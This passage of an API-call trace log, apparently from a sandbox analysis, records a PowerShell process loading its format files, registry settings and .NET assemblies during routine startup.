	[0276.960] ReadFile (in: hFile=0x1cc, lpBuffer=0x32a7de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x32a7de0*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.961] ReadFile (in: hFile=0x1cc, lpBuffer=0x32a7de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x32a7de0*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0277.371] ReadFile (in: hFile=0x1cc, lpBuffer=0x32a7de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x32a7de0*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0277.372] ReadFile (in: hFile=0x1cc, lpBuffer=0x32a7de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x32a7de0*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0277.372] ReadFile (in: hFile=0x1cc, lpBuffer=0x32a7de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x32a7de0*, lpNumberOfBytesRead=0x20ccf8*=0xfb2, lpOverlapped=0x0) returned 1
	[0277.373] ReadFile (in: hFile=0x1cc, lpBuffer=0x32a74fa, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x32a74fa*, lpNumberOfBytesRead=0x20ccf8*=0x0, lpOverlapped=0x0) returned 1
	[0277.373] ReadFile (in: hFile=0x1cc, lpBuffer=0x32a7de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x32a7de0*, lpNumberOfBytesRead=0x20ccf8*=0x0, lpOverlapped=0x0) returned 1
	[0277.373] CloseHandle (hObject=0x1cc) returned 1
	[0277.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0277.373] SetErrorMode (uMode=0x1) returned 0x1
	[0277.373] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20cca0 | out: lpFileInformation=0x20cca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0277.374] SetErrorMode (uMode=0x1) returned 0x1
	[0277.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0277.374] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cd88 | out: phkResult=0x20cd88*=0x1cc) returned 0x0
	[0277.374] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20cd0c, lpData=0x0, lpcbData=0x20cd08*=0x0 | out: lpType=0x20cd0c*=0x1, lpData=0x0, lpcbData=0x20cd08*=0x56) returned 0x0
	[0277.374] CoTaskMemAlloc (cb=0x5a) returned 0x1b785f50
	[0277.374] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20ccdc, lpData=0x1b785f50, lpcbData=0x20ccd8*=0x56 | out: lpType=0x20ccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20ccd8*=0x56) returned 0x0
	[0277.374] CoTaskMemFree (pv=0x1b785f50) 
	[0277.374] RegCloseKey (hKey=0x1cc) returned 0x0
	[0277.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0277.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0277.377] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x6c909b08, Data2=0x3717, Data3=0x4d60, Data4=([0]=0x82, [1]=0x66, [2]=0x6, [3]=0x97, [4]=0xcf, [5]=0x14, [6]=0xe2, [7]=0xf0))) returned 0x0
	[0277.380] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xd16b6a2b, Data2=0x85d1, Data3=0x4314, Data4=([0]=0xa4, [1]=0x49, [2]=0x58, [3]=0xf3, [4]=0xb1, [5]=0x38, [6]=0xd3, [7]=0x64))) returned 0x0
	[0277.380] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xf15cfe42, Data2=0x4e22, Data3=0x4ca2, Data4=([0]=0x82, [1]=0x93, [2]=0xda, [3]=0x5e, [4]=0xfd, [5]=0x79, [6]=0xfe, [7]=0x9e))) returned 0x0
	[0277.380] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x3bbe200c, Data2=0xe9ed, Data3=0x4cf2, Data4=([0]=0xaa, [1]=0x5b, [2]=0xe8, [3]=0xfb, [4]=0x99, [5]=0xee, [6]=0x2e, [7]=0x29))) returned 0x0
	[0277.380] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x25b094be, Data2=0xd962, Data3=0x48e8, Data4=([0]=0x90, [1]=0xb2, [2]=0x54, [3]=0x5, [4]=0xc8, [5]=0x1c, [6]=0x6d, [7]=0x24))) returned 0x0
	[0277.381] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xe0c34d37, Data2=0x717b, Data3=0x4668, Data4=([0]=0xa4, [1]=0xab, [2]=0xd2, [3]=0x2, [4]=0x40, [5]=0x8, [6]=0x51, [7]=0x45))) returned 0x0
	[0277.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0277.381] SetErrorMode (uMode=0x1) returned 0x1
	[0277.381] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1cc
	[0277.382] GetFileType (hFile=0x1cc) returned 0x1
	[0277.382] SetErrorMode (uMode=0x1) returned 0x1
	[0277.382] GetFileType (hFile=0x1cc) returned 0x1
	[0277.382] ReadFile (in: hFile=0x1cc, lpBuffer=0x32f3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x32f3b40*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0277.383] ReadFile (in: hFile=0x1cc, lpBuffer=0x32f3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x32f3b40*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0277.383] ReadFile (in: hFile=0x1cc, lpBuffer=0x32f3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x32f3b40*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0277.383] ReadFile (in: hFile=0x1cc, lpBuffer=0x32f3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x32f3b40*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0277.384] ReadFile (in: hFile=0x1cc, lpBuffer=0x32f3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x32f3b40*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0277.384] ReadFile (in: hFile=0x1cc, lpBuffer=0x32f3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x32f3b40*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0277.384] ReadFile (in: hFile=0x1cc, lpBuffer=0x32f3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x32f3b40*, lpNumberOfBytesRead=0x20ccf8*=0xaca, lpOverlapped=0x0) returned 1
	[0277.385] ReadFile (in: hFile=0x1cc, lpBuffer=0x32f3172, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x32f3172*, lpNumberOfBytesRead=0x20ccf8*=0x0, lpOverlapped=0x0) returned 1
	[0277.385] ReadFile (in: hFile=0x1cc, lpBuffer=0x32f3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x32f3b40*, lpNumberOfBytesRead=0x20ccf8*=0x0, lpOverlapped=0x0) returned 1
	[0277.385] CloseHandle (hObject=0x1cc) returned 1
	[0277.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0277.385] SetErrorMode (uMode=0x1) returned 0x1
	[0277.385] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20cca0 | out: lpFileInformation=0x20cca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0277.386] SetErrorMode (uMode=0x1) returned 0x1
	[0277.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0277.386] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cd88 | out: phkResult=0x20cd88*=0x1cc) returned 0x0
	[0277.386] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20cd0c, lpData=0x0, lpcbData=0x20cd08*=0x0 | out: lpType=0x20cd0c*=0x1, lpData=0x0, lpcbData=0x20cd08*=0x56) returned 0x0
	[0277.386] CoTaskMemAlloc (cb=0x5a) returned 0x1b785f50
	[0277.386] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20ccdc, lpData=0x1b785f50, lpcbData=0x20ccd8*=0x56 | out: lpType=0x20ccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20ccd8*=0x56) returned 0x0
	[0277.386] CoTaskMemFree (pv=0x1b785f50) 
	[0277.403] RegCloseKey (hKey=0x1cc) returned 0x0
	[0277.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0277.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0277.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0277.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0277.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0277.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0277.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0277.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0277.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0277.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0277.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0277.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0277.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0277.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0277.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0277.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0277.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0277.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0277.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0277.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0278.312] VirtualQuery (in: lpAddress=0x20b820, lpBuffer=0x20c6e0, dwLength=0x30 | out: lpBuffer=0x20c6e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.313] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x9c069fea, Data2=0xe92b, Data3=0x467d, Data4=([0]=0x87, [1]=0xe4, [2]=0x92, [3]=0xd0, [4]=0xa, [5]=0x1c, [6]=0x4d, [7]=0xa4))) returned 0x0
	[0278.314] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xd793a8c5, Data2=0xd62e, Data3=0x454b, Data4=([0]=0x8d, [1]=0xac, [2]=0x62, [3]=0x6f, [4]=0xb6, [5]=0xae, [6]=0xb2, [7]=0xa2))) returned 0x0
	[0278.315] VirtualQuery (in: lpAddress=0x20b9d0, lpBuffer=0x20c890, dwLength=0x30 | out: lpBuffer=0x20c890*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.316] VirtualQuery (in: lpAddress=0x20b9d0, lpBuffer=0x20c890, dwLength=0x30 | out: lpBuffer=0x20c890*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.317] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xb1cbe3da, Data2=0xce52, Data3=0x439f, Data4=([0]=0xaf, [1]=0x86, [2]=0xa, [3]=0x90, [4]=0xac, [5]=0xae, [6]=0xaa, [7]=0xe0))) returned 0x0
	[0278.320] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xe4c048ee, Data2=0x72ec, Data3=0x4525, Data4=([0]=0xae, [1]=0x49, [2]=0xa, [3]=0x58, [4]=0x5d, [5]=0x38, [6]=0x19, [7]=0xdf))) returned 0x0
	[0278.321] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.322] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.322] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.322] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xf802b785, Data2=0x2786, Data3=0x44c9, Data4=([0]=0xaf, [1]=0x8a, [2]=0x61, [3]=0x5f, [4]=0x70, [5]=0xd, [6]=0x4c, [7]=0x90))) returned 0x0
	[0278.772] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.772] VirtualQuery (in: lpAddress=0x20ba40, lpBuffer=0x20c900, dwLength=0x30 | out: lpBuffer=0x20c900*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.773] VirtualQuery (in: lpAddress=0x20b290, lpBuffer=0x20c150, dwLength=0x30 | out: lpBuffer=0x20c150*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.773] VirtualQuery (in: lpAddress=0x20b290, lpBuffer=0x20c150, dwLength=0x30 | out: lpBuffer=0x20c150*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
